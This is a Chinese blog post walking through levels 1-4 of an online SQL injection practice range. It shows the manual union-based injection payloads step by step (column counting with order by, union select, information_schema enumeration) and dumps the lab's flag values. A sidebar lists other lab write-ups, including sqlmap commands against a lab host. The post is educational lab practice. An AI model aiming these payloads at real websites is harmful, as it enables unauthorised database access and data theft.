封神台-SQL注入实战靶场1-4题解题过程

最新推荐文章于 2024-02-03 08:00:00 发布
最新推荐文章于 2024-02-03 08:00:00 发布
阅读量1k 收藏
点赞数 2
分类专栏: SQL注入学习 文章标签: 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43367379/article/details/117046205
版权

背景

这是最基本的显错注入

已经给出SQL查询语句
select * from user where id=1
不需要先去判断是字符型还是数字型,去一步一步测出sql查询语句了

废话不多说,直接上解题步骤

1.在url地址栏上 ?id=1 后面拼接 order by 3

说明: 所有操作都是在地址栏上拼接字符串实现的,没有借助工具
https://...?id=1 order by 3

结果为 正确显示 当前用户的账号和密码

2.在url地址栏上 ?id=1 后面拼接 order by 4

https://...?id=1 order by 3
结果为 not found 。说明字段数为3

(为什么是3而不是其他?也可以从1开始试,一般情况下用户登录表都有id,username,password 三个字段,所以从3开始)

得到关键信息:用户信息表的字段为3

3.?id=0 union select 1,2,3

https://...?id=0 union select 1,2,3
返回结果为

Your Login name:2
Your Password:3

说明:id=0 返回的数据是空的, 用union 拼接select语句
根据返回的结果判断,我们 能看到的字段名是2,3

4.查看数据库名和数据库版本

https://...?id=0 union select 1,version(),database()
结果为

Your Login name:5.6.47
Your Password:error

可以知道数据库的版本是 5.0以上的,这样我们后续的操作才有意义,具体的解释可以自行百度

看到数据库名 为error 不要慌,不是真的error 而是数据库名就是error

5.根据数据库名获得该数据库中的表

?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()

结果为:

Your Login name:error_flag,user
Your Password:3

根据结果可知,有两张表,一张error_flag,应该是存放flag的,一张是user,存放信息的。

6.根据表名查表的字段名

?id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='error_flag'
结果为

Your Login name:Id,flag
Your Password:3

7.根据字段名查数据

?id=0 union select 1,group_concat(flag),3 from error_flag

结果为

Your Login name:zKaQ-Nf,zKaQ-BJY,zKaQ-XiaoFang,zKaq-98K
Your Password:3

这四个值就是这四道题的flag,挨个提交即可通关一到四题

qq_43367379
关注
专栏目录
SQL靶场练习(包含字符型、数字型、宽字节、post)
Lorezon的博客
01-13 582
一:字符型注入 当输入的参数为字符串时,称为字符型,需要用单引号来闭合。 初始页面是这样的: 第一步:判断注入类型 1.在name=root 后添加一个单引号使之变为name=root',发现页面返回错误: 说明存在注入。 2.接下来构造语句name=root' and '1'=1--+',页面返回正常: 将and '1'=1改成and '1'=2,发现页面返回错误: 说明这里的注入是字符型注入。...
神台 sql 注入靶场 writeup
白帽渗透笔记的博客
07-21 851
今天给大家带来神台 sql 注入靶场前 4 关的解题思路,并不算难。 地址 https://hack.zkaq.cn/battle#bid=cd23d4b58f0dfd3e 0x01 首先判断是否存在注入点,修改地址,尝试 id=1 and 1=1 可以正常显示数据,id=1 and 1=2 无法显示数据,故存在注入。 继续猜解字段数,id=1 order by 1 可以正常显示数据,一直到 4 才无法显示,故字段数为 3,使用 id=1 and 1=2 union select 1,
神台SQL注入靶场练习(sqlmap)
热门推荐
00勇士王子的博客
11-01 1万+
靶场地址 https://hack.zkaq.cn 解题过程 1.进入目 2.只有个 点击查看新闻,点击进入 3.发现参数id,肯定就是我们要注入的参数了,先用sqlmap跑一遍 查询数据库 python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --dbs 因为我们需要获得管理员密码,所以要查maoshe数据库 python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --tabl
神台-靶场-第一章:为了女神小芳!(解)+ 中北网安实训笔记-(20200701)-sql注入基本语法
tonyhapply的博客
07-18 1593
我们先来学习sql注入
MySql 高级查询 union 联合查询
qq_39286483的博客
01-09 314
1. union 联合查询 将多个查询结果集合到一起 2. 语法 select 查询语句 union select 查询语句 union select 查询语句 union select 查询语句 3. 例子: 查询学生信息和班级信息,集合到一起 select class_id,class_name,class_room from class UNION select name...
SQL注入sqli-labs靶场通关(1-37关)
最新发布
qq_68163788的博客
02-03 7076
sqli-labs是一个用于学习和练习SQL注入的开源项目。它提供了一系列的实验室环境,让用户能够在不同的SQL注入场景中进行练习和测试。这些场景包括基本的SQL注入、盲注、联合查询注入等等。 sqli-labs还提供了详细的说明和解释,帮助用户理解SQL注入的原理和技术。通过这些实验和学习,用户可以更好地了解SQL注入的危害,并学会如何防范和阻止SQL注入攻击
神台SQL注入-基础靶场1-显错注入
原味瓜子、的博客
09-28 1401
一、显错注入 Pass-01 判断注入类型 id=1 //有回显 id=1' // No results found 判断为数字型注入 判断有几列 id=1 order by 3 //有回显 id=1 order by 4 // No results found 判断有三列 判断回显点 id=1 union select 1,2,3 ...
神台SQL注入-基础靶场1-布尔盲注
原味瓜子、的博客
10-09 1615
1
神台SQL注入-基础靶场1-Head注入
原味瓜子、的博客
10-10 1132
1111
神台SQL注入-header注入
qq_40941912的博客
08-25 733
一、原理 数据路径出现符号是会爆错的 全局变量: $_REQUEST (获取GET/POST/COOKIE) COOKIE在新版本已经无法获取了 $_POST (获取POST传参) $_GET (获取GET的传参) $_COOKIE (获取COOKIE的值) $_SERVER (包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组) **$_SERVER()**它包含着诸多的信息,有头信息(heander),路径(path),脚本位置
SQL注入——sqli-labs靶场闯关(1~5)
qq_52072846的博客
02-24 1927
Less-1 Error Based- String 1.经过语句and 1=2测试 ,页面回显正常,所以该地方不是数值查询 2.接着尝试在id后面加上',发现页面回显不正常,表示可能存在SQL字符注入 3.输入--+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入 4.接着使用order by 语句判断,该表中一共有几列数据 order by 3页面回显正常,order by 4页面回显不正常,说明此表一个有3列。 5.将id=1改为一...
pikachu靶场SQL注入解题思路
weixin_44500257的博客
02-21 1575
第一关 数字型注入(POST) 操作界面如下图 使用burpsuit对流量进行抓包,把数据包发送到Repeater模块进行测试 发送正常流量,web界面正常响应情况如下图所示 首先我们要了解该关卡注意的考点①数据类型是数字型②提交方式是POST 注入点的判断有很多方式,核心的思想就是id=后面的参数能否带入数据库查询,如果参数是数据库查询语句能否执行payload语句。 判断第一步:id=1 后面加 ‘ “ ‘) “)来查询后台SQL查询语句id的闭合方式 ‘ 报错 “报错 ‘) 报错 “
SQL注入靶场sqli-labs详细解题记录1-10
Senimo
03-21 2124
SQL注入靶场sqli-labs详细解题记录1-10前言Less-1Less-2Less-3Less-4Less-5Less-6Less-7Less-8Less-9Less-10 前言 为了更方便的学习,在每关中的index.php文件中填入如下代码: echo $sql; echo'<br>'; 添加在如下位置: // connectivity $sql="SELECT * F...
Sqli-Labs靶场(17--20)解析
weixin_46099095的博客
03-14 4180
Less-17:POST - Update Query - Error Based - String(POST - 更新查询 - 基于错误 - 字符串) 这里无论我们在User Name栏输入什么除了正确的用户名admin,他都会报错,难道这就没有注入点啦? 来,我们先看一下源码 左边是Less-16的源码,右边是Less-17的源码,看不懂每关系,我也看不懂,但是知道uname多了一个东
sqli-labs靶场challenges第54-75关(超详细)
weixin_51566481的博客
08-18 2351
sqlilabs,sql注入
神台在线靶场--尤里的复仇Ⅰ 小芳!【8
feiniaotjx的博客
10-20 9495
靶场练习 神台-掌控安全在线演练靶场 第一章:为了女神小芳!
靶场sql注入练手----sqlmap篇(纯手打)
qq_30235073的博客
05-20 1414
靶场地址:神台 方法一、首先尝试手工找注入点判断 第一步,判断是否存在sql注入漏洞 构造 ?id=1 and 1=1 ,回车,页面返回正常 构造 ?id=1 and 1=2 ,回车,页面不正常,初步判断这里 可能 存在一个注入漏洞 第二步:判断字段数 构造 ?id=1 and 1=1 order by 1 回车,页面正常 构造 ?id=1 and 1=1 o...
神台靶场-第二章
Mr_helloword的博客
07-12 3079
第二章:遇到阻难!绕过WAF过滤 1.查找有无sql注入点利用and 1=1发现做了过滤 使用order by 查字段数发现order by 没有被过滤,最后当字段为10时显示正常字段为10 2.因为网页做了waf过略防护,这里我们考虑用cookie注入,可以进行绕过: 这里我们使用一个小工具进行注入(火狐插件) 这款工具可以自定义请求头响应头(Request header,Reponse header) 打开这款插件直接在value处填写注入参数即可然后按上面的键开始(value中的值需要注意的是空
神台靶场-第三章
Mr_helloword的博客
07-12 2290
第三章:爆破管理员账户登录后台 使用工具:御剑后台扫描,burpsuit 进入网站后想进入管理后台页面,试着在url地址后加/admin常试结果成功了,如果不成功再用工具扫描如下: 登陆后台后使用bp暴力破解模块爆破账户密码(这里我们知道账号密码就不具体演示了): 3.使用bp修改数量价格 flag ...
c4d修神记:零基础到三维神 下载
01-05
"c4d修神记:零基础到三维神"是一本关于学习Cinema 4D(简称C4D)软件的书籍。C4D是一款强大的三维建模、动画和渲染软件,广泛应用于电影、游戏、广告等领域。该书以零基础的读者为目标群体,旨在通过系统的教程和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值